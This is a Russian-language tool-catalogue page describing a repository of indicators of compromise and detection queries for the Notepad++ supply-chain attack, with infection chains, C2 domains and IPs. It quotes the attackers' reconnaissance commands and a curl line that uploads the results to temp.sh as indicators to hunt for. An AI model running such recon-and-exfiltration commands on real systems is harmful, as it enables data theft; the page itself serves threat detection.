Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
notepadpp-supply-chain-iocs — Индикаторы компрометации и правила обнаружения для атаки на цепочку поставок Notepad++ (CVE-2025-15556) — Lotus Blossom APT, июнь–декабрь 2025. Включает запросы Falcon LogScale, правила YARA/Sigma и сопоставление с MITRE ATT&CK. | Kitploit
Инструменты/GitHubGitHub/renat0z3r0/notepadpp-supply-chain-iocs
Управление индикаторами компрометации (IOC)Фиды и агрегаторы угрозАнализ уязвимостейФорензикаАнализ вредоносных программРазведка угрозБезопасность Цепочки ПоставокОбучение и ОбразованиеРеагирование на Инциденты

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
GitHubrenat0z3r0/notepadpp-supply-chain-iocs

notepadpp-supply-chain-iocs

Индикаторы компрометации и правила обнаружения для атаки на цепочку поставок Notepad++ (CVE-2025-15556) — Lotus Blossom APT, июнь–декабрь 2025. Включает запросы Falcon LogScale, правила YARA/Sigma и сопоставление с MITRE ATT&CK.

Репозиторий
1207 месяцев назадЕщё не проверено
Поделиться

Атака на цепочку поставок Notepad++ — репозиторий IoC

CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | июнь – декабрь 2025

Last Updated IoC Count License: MIT MITRE ATT&CK


Обзор

Этот репозиторий содержит полный консолидированный набор индикаторов компрометации (IoC), связанных с атакой на цепочку поставок Notepad++, раскрытой 2 февраля 2026 года.

В период с июня по декабрь 2025 года спонсируемый китайским государством субъект угрозы скомпрометировал хостинг-инфраструктуру Notepad++, перехватив встроенный механизм обновления (WinGUp) для выборочной доставки троянизированных установщиков целевым пользователям. Атака использовала отсутствие криптографической проверки в обновляторе (до версии 8.8.9), что позволило распространять собственные бэкдоры, Cobalt Strike Beacon и полезные нагрузки Metasploit.

Ключевые факты

CVECVE-2025-15556 — загрузка кода без проверки целостности
Субъект угрозыLotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon)
Период активностииюнь 2025 — 2 декабря 2025
Вектор атакиКомпрометация цепочки поставок через автообновление WinGUp
ЦелиГосударственные органы, телекоммуникационные и финансовые организации, IT-провайдеры (Филиппины, Вьетнам, Сальвадор, Австралия, Восточная Азия)
Вредоносное ПОбэкдор Chrysalis (собственный), Cobalt Strike Beacon, Metasploit Meterpreter
Исправлено вNotepad++ v8.8.9+ (проверка сертификата) / v8.9.1+ (валидация XMLDSig)

Цепочки заражения

Kaspersky GReAT выявила три различные цепочки заражения, которые ротировались примерно ежемесячно для уклонения от обнаружения:

Цепочка №1 — июль/август 2025

GUP.exe → update.exe (NSIS) → ProShow.exe (legitimate) → exploit via "load" file
  → Metasploit downloader → Cobalt Strike Beacon
  • Использует старую уязвимость в ПО ProShow вместо DLL-сайдлоадинга
  • Разведка: whoami && tasklist → эксфильтрация через temp.sh
  • Рабочий каталог: %appdata%\ProShow\

Цепочка №2 — сентябрь/октябрь 2025

GUP.exe → update.exe (NSIS) → script.exe (Lua interpreter) → alien.ini (compiled Lua)
  → shellcode via EnumWindowStationsW → Metasploit downloader → Cobalt Strike Beacon
  • Использует легитимный интерпретатор Lua для выполнения скомпилированного шеллкода
  • Расширенная разведка: whoami && tasklist && systeminfo && netstat -ano
  • Рабочий каталог: %appdata%\Adobe\Scripts\

Цепочка №3 — октябрь 2025

GUP.exe → update.exe (NSIS) → BluetoothService.exe (legitimate) → log.dll (sideloaded)
  → decrypts "BluetoothService" shellcode → Chrysalis backdoor
  • Классическая техника DLL-сайдлоадинга
  • Без встроенной разведки (в отличие от цепочек 1 и 2)
  • Рабочий каталог: %appdata%\Bluetooth\
  • Связанный Cobalt Strike Beacon обнаружен в C:\ProgramData\USOShared\
                     ┌─────────────────────────────────────────────────────────┐
                     │              COMPROMISE TIMELINE                        │
                     ├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
                     │  Jul 25 │  Aug 25 │  Sep 25 │  Oct 25 │  Nov 25 │Dec 25│
                     ├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
  Chain #1 (ProShow) │████████████████████                                    │
  Chain #2 (Lua)     │                    █████████████████████████████        │
  Chain #3 (DLL SL)  │                              ██████████████            │
  Infra access       │████████████████████████████████████████████████████████│
                     └────────────────────────────────────────────────────────┘

Содержимое репозитория

ФайлОписание
notepadpp_supply_chain_iocs.csvПолный набор данных IoC (105 индикаторов) с сопоставлением с MITRE ATT&CK

Схема CSV

ПолеОписание
ioc_typeТип: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window
ioc_valueЗначение индикатора
chainЦепочка заражения (1, 2, 3, 1/2, 2/3, all, n/a)
contextОписание того, что представляет собой IoC
sourceИсточник разведданных (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont)
riskКритичность (CRITICAL, HIGH, MEDIUM, LOW, INFO)
mitre_techniqueИдентификатор техники MITRE ATT&CK

Обнаружение и охота за угрозами

Приоритетные индикаторы (начните здесь)

Поведенческие — не зависят от IoC, наибольшая ценность:

  • gup.exe, порождающий любой дочерний процесс, кроме легитимного подписанного установщика Notepad++
  • gup.exe, подключающийся к доменам/IP-адресам, отличным от notepad-plus-plus.org, github.com, release-assets.githubusercontent.com
  • Создание каталогов: %appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\
  • Создание %localappdata%\Temp\ns.tmp\ (среда выполнения NSIS — присутствует во всех цепочках)

Сетевые — высокая степень уверенности:

  • Разрешение DNS для cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com
  • Подключения к temp.sh (51.91.79.17) — особенно с загрузкой файлов через curl
  • HTTP-запросы с URL-адресами temp.sh, встроенными в заголовок User-Agent
  • Исходящие подключения к 45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210

Команды разведки (пост-эксплуатация):

cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload

Запросы CrowdStrike Falcon LogScale

Поведенческий анализ: поиск дочерних процессов GUP.exe
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
Поиск по множеству IoC в событиях процессов, сети и DNS
Скачать инструмент